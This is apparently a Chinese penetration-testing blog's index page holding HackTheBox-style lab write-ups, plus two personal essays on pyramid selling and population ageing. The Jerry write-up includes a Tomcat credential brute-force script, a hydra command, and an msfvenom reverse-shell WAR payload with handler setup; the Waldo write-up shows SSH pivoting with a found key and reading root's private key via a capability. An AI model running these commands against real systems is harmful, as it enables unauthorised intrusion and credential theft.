InfoSec Learning


  • 首页

  • 归档

  • 标签

  • 搜索

Access(port:23-telnet登入反弹cmd)

发表于 2019-01-11 | 分类于 training

``` Nmap scan report for 10.10.10.98 Host is up (0.13s latency). Not shown: 997 filtered ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http

阅读全文 »

Devel(ftp匿名登陆可读可写)

发表于 2019-01-10 | 分类于 training

10.10.10.5

阅读全文 »

masscan结合python快速枚举批量主机端口

发表于 2019-01-09 | 分类于 scan

还记得当时360电话面试的时候,问我互联网上最快的扫描器是什么,我回答的zenmap?

阅读全文 »

论传销

发表于 2019-01-08 | 分类于 View

论传销

写这篇文章的起因。

最近苹果手机电池不行了,一到百分之30就噌噌噌往下掉。于是我上班的间歇,就找了个手机维修店。店主把我的手机拆开,然后让我等十多分钟,还拿着吹风机吹。然后就出门了,让我等一会儿。

我百无聊赖的也不知道干什么,盯了一会儿拆下来的电池。电池居然是软的,被掰弯了==

期间,有一个搞推销的青年走了进来。一开始给店员推销,店员拼命拒绝。他的脖子上很明显的钴蓝色带子,挂着的应该是证件,加上他尴尬推销的话术,让我对他产生了观察的兴趣。

因为无聊,我盯着他们看,推销青年就走了过来,问我听没听过xxx。

??一问三不知的我

听了一会儿,我调戏小哥“传销是犯法的你知道吗?”

然后他说和百度合作,企业成立7年,还说什么打压京东淘宝。还说这个平台上什么都有。

他说的话槽点太多,不知道从那吐槽起。百度??莆田系医院知道么?竞价排名知道吗?央视打过广告的e租宝知道么?

我,“….” (反正修手机,等着也是等着,调戏他打发一下时间)心里一直在吐槽,什么破平台,听都没听过,打压京东淘宝这种话都说得出来,呵呵。

一开始,他说平台上什么都有,我没往那方面想。一翻app,发现一个问题,基本卖的是母婴产品。

“既然蜜芽是母婴产品,不要在手机店推销”。目标群体都选择错误了,我建议他。


他尝试获取我的信任,利用百度等具有知名度的企业名声。

然后给我看了一些照片视频,说明蜜芽是个成功的平台。最后塞给了我一张艳红色的充满廉价感的广告纸,羞涩地指了指上面他的微信号。

我无语地盯着上面的“xxx月入上万”


传销就是骗子忽悠傻子。 捕获

不管它是不是传销,还是什么分享经济。淘宝京东等大平台具有垄断性质,现在仿照这种模式抢占市场就是死路一条。

网上搜索一下,没有任何消息,太正常了。e租宝跑路之前,也不是相安无事吗。


猜测他们应该是组织化的,看这个男人的言辞,不像是有能力独立运作这些的人。

传单、产品、脖子上挂的证件,被别人拒绝后依然软磨硬泡了几十分钟。

都让我猜测,他回去以后,别人给他定了多少“销售目标”。


我想起了以前看的《中国少了一味药》,作者潜入传销集团,探究是什么让传销屡禁不止。

多的不想再说了。只是觉得今天遇到的这个男人很可怜,怀着发财梦穿梭在大街小巷。

阅读全文 »

Joker(http-proxy)

发表于 2019-01-07 | 分类于 training

10.10.10.21

阅读全文 »

Grandpa(msf栈溢出)

发表于 2019-01-06 | 分类于 training

10.10.10.14

阅读全文 »

Popcorn(文件上传)

发表于 2019-01-04 | 分类于 training

scan

1
2
3
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
PHP/5.2.10-2ubuntu6.10

web

先检查破壳漏洞,然后检查/test目录泄露的信息 1 ``` 获取的信息: Server Administrator webmaster@localhost

阅读全文 »

lame(samba)

发表于 2019-01-03 | 分类于 training

10.10.10.3

阅读全文 »

浅析老龄化社会对年轻一代的影响

发表于 2018-12-27 | 分类于 View

由形教课期末要交论文,而产生了这篇文字

摘要:

参考了国外对于老龄化现象采取的措施,调查了2018年中国老龄化现状,结合查阅的资料和文献, 对国家采取的政策,进行浅要解读。

并对年轻一代,面临着社会压力,需要进行的准备提供了一些建议。

关键词:

二胎政策、老龄化社会、抚养比、经济与文化现象

正文:

从开放二胎说起,2015年年底,全国人大常委会表决通过了人口与计划生育法修正案,全面二孩定于2016年1月1日起正式实施。

2017 年中国出生人口 1723 万人,比 2016 年减少 63 万人。(数据来源:国家统计局发布资料)

今年是2018年年底,二胎政策放开后,人口数量不升反降。2017年,一胎数量为841万,比2016年少了121万人。

从以上数据推算,2027年,中国新生人口不会超过800万/年。

预计今年年底会全面放开生育政策。

少子化和老龄化息息相关。在这种社会状况之下,于是我对各个发达国家同样遇到的老龄化问题进行了调查与研究。

小标题1:中国现在的老龄化程度及预期

老龄化判断的旧标准为,60岁以上人口占总人口10%;新标准,65岁以上人口占总人口7%。

中国于2000年进入老龄化社会(60岁以上人口达1.3亿人,占总人口10.2%。摘自百度百科,2010年第六次人口普查数据没有显示在该词条内)

2010年,65岁及以上人口为118,831,709人,占8.87%。摘自维基百科,第六次人口普查统计。

2012年底,中国60岁以上老年人口约1.9亿,占总人口的14%。摘自维基百科。

2015年60岁及以上人口达到2.22亿,占总人口的16.15%。

2030年,预计65岁以上的人口占全国总人口的比重将提高到18.2%。

小标题2:劳动力下降的相关数据

中国有多少劳动力?劳动力下降有多么迅速?

2012 年中国劳动力总量首次下降,达 345 万,2013 年 244 万,2014 年 371 万,2015 年 487 万,2016 年 349 万。劳动力总量下降已满五年,劳动力累计减少 1796 万。

人口出生数据

1963-73年生育潮出生的人口退休,如果根据60岁退休年龄来计算,2023年开始,劳动力将下降的十分迅速。市场上每年将消失2500万左右劳动力。

而不像直观想象的那样,由于国外投资将逐渐撤离中国,所以工作机会不但不会因为劳动人口的稀缺而增加,而是会进一步加剧找工作的难度。

由于劳动力供需短时间失衡,体力劳动、技术工种等等,报酬将会会增加许多。

由于国内经济不能提供足够的高端就业岗位,使得大学生能够匹配相应的工作。

对毕业生的启示是,增加就业技能的重视和训练,提高核心竞争力。

小标题3:中国应对老龄化的政策

延迟退休:现有退休时间为男性60周岁,女性55周岁。

其他国家退休时间: 60岁——全球有102个国家 65岁——全球有44个国家

从2018年开始,女性退休年龄每3年延迟一岁,男性退休年龄每6年延迟1岁,直到2045年同时达到65岁。

退休时间和人均寿命的对比:中国2017年人均寿命76.7岁。

基本上,90后老了以后,预期退休年龄为65-70岁之间,而预期人均寿命为80+。

开放二胎 90后抚养子女要考虑的问题:

  • 昂贵的教育成本

少子化,导致家庭都抱有优生优育的理念。而高等教育很昂贵,将一个婴儿抚养至大学毕业,至少需要花费50至130万元人民币。

当家庭规模的缩小,家庭往往愿意投入更多的金钱,让孩子接受更高等的教育。

而昂贵的养育成本和高不可攀的房价,导致生育一胎以上,成了不理想的选择。

关于移民: 中国和日本一样,是一个注重传统的国家,所以预计中国不会选择移民来缓解老龄化。

小标题4:各个老龄化国家的现象

日本篇: 在日本,单身成为一种生活方式。年轻人压力太大,选择不生育(生育需要更多的钱)。现代社会,生活的轻松并不需要太多钱,出现佛系青年文化。 很多人,选择和父母住在一起,中年过着和少年时期一样的生活。

因为即使每个年轻女性都生育2个小孩,这也不能阻止人口下降。因为总有新生人口生长至成年的损耗。

加上生育2个小孩,对已经步入老龄化的社会,个人面临的压力来说,不是一个轻松的生活状态。

于是进入老龄化社会,就意味着,缺少劳动力、社会压力大、市场低迷、消费不振;老龄人得不到完善的照顾;年轻人产生“五抛世代”——抛弃恋爱、结婚和生育,人际关系和购房。

实际上还是过于稀少的年轻人导致的。如果年轻人数量多一些,那么分摊到每一个年轻人身上的税收压力也不会那么大。

而对年轻人收更高的税,短期上好像对养老金有所帮助。长期来看,年轻人会生育更少的孩子,让老龄化程度更加严重,进入恶性循环,导致几十年的经济衰退。

苏联篇:

苏联欧洲部分人口在二战后急剧老龄化,劳动力不断萎缩,而晚于苏联二三十年进入社会主义的东欧诸国,也在苏联解体二三十年后,经历了不间歇的人口萎缩危机。

五十年代,当美国正经历「婴儿潮」时,苏联的堕胎数却超过了婴儿出生数。苏联人非常费解,于是官方做了一个大规模的问卷调查,询问了两万多名堕胎的妇女为什么不想要孩子。

理由是住房短缺。

苏联号称房子国家分,但对象只是「符合政策」的人。不是生了孩子,就一定能分到房子。前苏联既没有一个成熟的房地产市场满足居住空间,又不能靠公家分房。理论上计划经济能够按需满足生育所需的一切资源,实际上,它的运转却随国家意志,向军事、工业等方向倾斜,住房的短缺,是生育所需的物质支援匮乏的缩影。

和前苏联类似的是,住房导致的低生育率。

房地产是最好的避孕药。年轻人没有房子,就没办法结婚生子。加上政策把教育等福利强行和住房捆绑,以此去库存。内需不足,经济不振就很好理解。

小标题5:老龄化对职业的影响

日本非正式雇佣状况

在日本,企业越来越倾向于雇佣临时工,有着同工不同酬的现象。

因为日本有着“终生雇佣制”,一个员工在一家公司,往往是从毕业干到退休。终身雇佣制起源于第一次世界大战期间,在第二次世界大战后的日本快速发展期间得到了进一步的发展和完善,并与报酬体系和职务升迁等制度形成了互补性。

但是对企业来说,雇佣年轻人比雇佣老年人更加划算。终生雇佣制度,会让企业雇佣人时候,更加谨慎。对于年轻人来说,拥有一个不稳定的工作,相比终生雇佣的员工,让人更加不愿意结婚。

对于我国来说,除了国企、事业单位,并没有终生雇佣的传统。四五十岁以后,企业就不愿意再雇佣这样的员工。

参考文献:

  • 《当世界又老又穷——全球老龄化大冲击》(美)泰德·菲什曼
  • 韩国纪录片《明见万里之人口冲击》
  • BBC纪录片《别和日本人谈性》
  • 《日本今年新生人口数创新低 空房子如瘟疫般蔓延》
  • 新浪-国内财经:我国劳动力5年减少2000万 2050年或降到7亿————http://finance.sina.com.cn/china/gncj/2016-11-21/doc-ifxxwrwh4788441.shtml
  • 金融界网站http://finance.jrj.com.cn/2017/03/31101122249888.shtml
  • 多维新闻http://blog.dwnews.com/post-1013956.html

    提交时间:2018年12月21日

阅读全文 »

jerry(apache tomcat的暴力破解方式)

发表于 2018-12-26 | 分类于 training

info enum

1
2
3
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Apache Tomcat/7.0.88

apache登陆,以前遇到过

当时采取的方式是,通过python脚本,将字典处理为“admin:admin”类似的形式,然后再编码一次。

方(偷)便(懒)起见,用burp intruder模块爆破。

缺点:如果字典过大,burp总是会卡死==

现在又遇到了apache认证,观察以下数据包。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
GET /manager/html HTTP/1.1

Host: 10.10.10.95:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.95:8080/

Connection: close

Upgrade-Insecure-Requests: 1

Authorization: Basic MTIzMTIzOjMyMTIz

暴力破解脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import base64
import requests

url = "http://10.10.10.95:8080/manager/html"
S = requests.Session()

user = open("/usr/share/wordlists/tomcat-betterdefaultpasslist.txt","r")

for each in user.readlines():

	key = base64.b64encode(each)

	what_the_fuck_pass = "Basic "+key

	headers={ 'Host': '10.10.10.95:8080',\

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\

'Accept-Language': 'en-US,en;q=0.5',\

'Referer': 'http://10.10.10.95:8080/',\

'Connection': 'close',\

'Upgrade-Insecure-Requests': '1',\

'Authorization': what_the_fuck_pass

}

	send_pass = S.get(url,headers=headers)

	if send_pass.status_code == '200':

		print key

		break

	else:

		#print headers

		print key+"--error"

user.close()

hydra

1
2
3
4
5
apt search seclists
apt-get install seclists
cd /usr/share/seclists/
find . | grep -i tomcat
hydra -C Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.10.10.95:8080/manager/html

获得弱密码,就可以登陆服务器

上传命令执行脚本

曾经做过war类型文件上传,获取shell

war file是打包好的java代码。select war file to upload

用msfvenom生成war payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali-ip LPORT=9001 -f war -o xx.war

msfvenom

它用于生成payload。参考资料

msfvenom -l payload 查看所有攻击载荷

msfvenom -l formats

获取shell

1
2
3
4
5
6
msfconsole
use exploit/multi/handler/
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0 设置监听的网卡/端口
set LPORT 9001
exploit -j 

1 当上传成功xx.war,就可以访问以下地址,获得一个shell。

http://target.com:8080/xx/krnlxctxgebr.jsp

1
2
3
4
sessions -i 1
getuid
shell
已经获得root权限
阅读全文 »

waldo(docker虚拟机-linux capabilities提权)

发表于 2018-12-23 | 分类于 training

续上篇

拿到一个ssh shell,准备提权。

trying

1

1
2
uname -a
Linux waldo 4.9.0-6-amd64 

无gcc


2

1
2
cat /etc/passwd | grep home
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh

普通用户就一个

1
2
3
4
5
sudo -l
-sh: sudo: not found

su root
-sh: su: not found

意识到su命令不可能没有,于是想要反弹一个bash shell

1
2
ssh -i id_rsa nobody@10.10.10.87 bash
sh: bash: not found

喵喵喵??于是回头看一下/etc/passwd。root:x:0:0:root:/root:/bin/ash

哦哦~

1
2
ssh -i id_rsa nobody@10.10.10.87 ash
成功得到ash shell,但遗憾的是ash 和 sh没有太大区别

尝试用python,但是os.py被删掉了==

1
python -c 'import pty; pty.spawn("/bin/bash")'

3

ps -ef | grep root

1
2
3
4
5
6
    1 root       1:57 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
    7 root       0:00 nginx: master process nginx -g daemon off;
    8 root       0:00 /usr/sbin/sshd -D -e
    9 root       0:27 {php-fpm7} php-fpm: master process (/etc/php7/php-fpm.conf)
  111 root       0:00 sshd: nobody [priv]
  120 nobody     0:00 grep root
1
2
3
4
/etc/php7/php-fpm.d
-rw-r--r--    1 root     root         18767 Mar 31  2018 www.conf
-rw-r--r--    1 root     root          1374 May  3  2018 zzz_custom.conf
no thing intersting here

4

1
2
3
cd /
ls -al .dockerenv
-rwxr-xr-x    1 root     root             0 May  3  2018 .dockerenv

说明这是一个虚拟机容器,(⊙﹏⊙),虚拟机逃逸怎么做?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
find . -name "docker"
find: ./proc/tty/driver: Permission denied
find: ./proc/1/task/1/fd: Permission denied
find: ./proc/1/task/1/fdinfo: Permission denied
find: ./proc/1/task/1/ns: Permission denied
find: ./proc/1/fd: Permission denied
。。。省略。。。

ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:E2:B2:82:F0  
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ens33     Link encap:Ethernet  HWaddr 00:50:56:A4:3E:15  
          inet addr:10.10.10.87  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:394742 errors:0 dropped:166 overruns:0 frame:0
          TX packets:221201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:27756425 (26.4 MiB)  TX bytes:18990614 (18.1 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:259632 (253.5 KiB)  TX bytes:259632 (253.5 KiB)

ping 172.17.0.1
PING 172.17.0.1 (172.17.0.1): 56 data bytes
ping: permission denied (are you root?)

在freebuf、乌云镜像中,虚拟机逃逸的文都很少==

看看writeup。

用这条命令,可以检查现有的shell是不是运行在docker容器中。 grep -i docker /proc/self/cgroup 2>/dev/null;find / -name "*dockerenv*" - exec ls -la {} \; 2>/dev/null 5

netstat命令

Linux netstat命令详解 netstat without netstat 1

在home家目录下,有一个公钥,暗示了一个用户monitor。 2 .monitor是私钥 3

sshd_config

cat /etc/ssh/sshd_config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#	$OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/bin:/usr/bin:/sbin:/usr/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 8888
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_dsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile	.ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
#UsePAM no

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem	sftp	/usr/lib/ssh/sftp-server

# the following are HPN related configuration options
# tcp receive buffer polling. disable in non autotuning kernels
#TcpRcvBufPoll yes
 
# disable hpn performance boosts
#HPNDisabled no

# buffer size for hpn to non-hpn connections
#HPNBufferSize 2048


# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server
AllowUsers nobody

ListenAddress 0.0.0.0 ssh监听本地地址

获得另一个shell

monitor rshell

通过以上信息搜集,知道这是一个docker虚拟机。 这个主机/etc/passwd,没有monitor用户,但是home目录有ssh私钥。 通过查看ssh配置文件,得知监听本地端口。

于是我们可以尝试连接本地,来访问宿主机。

6

ssh monitor@127.0.0.1 -i .monitor -t bash 用这条命令,得到bash shell

比较一下ssh加-t、不加-t

7 cat,command not found

8

直观来看,加-t参数,有些命令没有,可能是环境变量的原因。

不加-t参数,虽然命令都有,但是显示起来,回显没有颜色,不直观。

其余的东西,因时间所限,以后再找一下相关资料。


提权前的信息搜集

有三个普通用户

1
2
3
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash
app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash

/home/monitor

1
2
3
4
5
6
7
8
9
10
11
12
13
ls -al
total 40
drwxr-x--- 5 root    monitor 4096 Jul 24 07:58 .
drwxr-xr-x 5 root    root    4096 May  3  2018 ..
drwxrwx--- 3 app-dev monitor 4096 May  3  2018 app-dev
lrwxrwxrwx 1 root    root       9 Jul 24 07:58 .bash_history -> /dev/null
-r--r----- 1 root    monitor   15 May  3  2018 .bash_login
-r--r----- 1 root    monitor   15 May  3  2018 .bash_logout
-r--r----- 1 root    monitor   15 May  3  2018 .bash_profile
-r--r----- 1 root    monitor 3598 May  3  2018 .bashrc
dr-xr-x--- 2 root    monitor 4096 May  3  2018 bin
-r--r----- 1 root    monitor   15 May  3  2018 .profile
dr-x------ 2 monitor monitor 4096 May  3  2018 .ssh

ls -iR

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
656302 app-dev
656301 bin

./app-dev:
656314 logMonitor
656315 logMonitor.bak
656309 logMonitor.c
656310 logMonitor.h
656312 logMonitor.h.gch
656313 logMonitor.o
656311 makefile
656303 v0.1

./app-dev/v0.1:
656316 logMonitor-0.1

./bin:
656305 ls
656307 most
656306 red
656308 rnano

1
2
3
4
getcap -r * 2>/dev/null
/usr/bin/tac -s @ /root/.ssh/id_rsa
/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac
tac /root/root.txt

9

总结:

getcap、tac、docker虚拟机、linux capabilities等概念都是第一次遇到==

下一次单独开一篇,探讨下权限问题。

唉~头疼

阅读全文 »

Waldo(php代码审计-用户输入过滤不严)

发表于 2018-12-21 | 分类于 training

info enum

1
2
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.5 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.12.2

web

1 该web,很简单,有4个php script,分别用来读、写、删除文件。

1
http://10.10.10.87/fileWrite.php

3

阅读全文 »
1 … 16 17 18 … 34
whale

whale

Aimed at Pro Penetration tester. Email me "weaponmaster3070@gmail.com"

408 日志
35 分类
48 标签
github
© 2021 whale
由 Jekyll 强力驱动
主题 - NexT.Mist
本站访客数 人 总访问量 次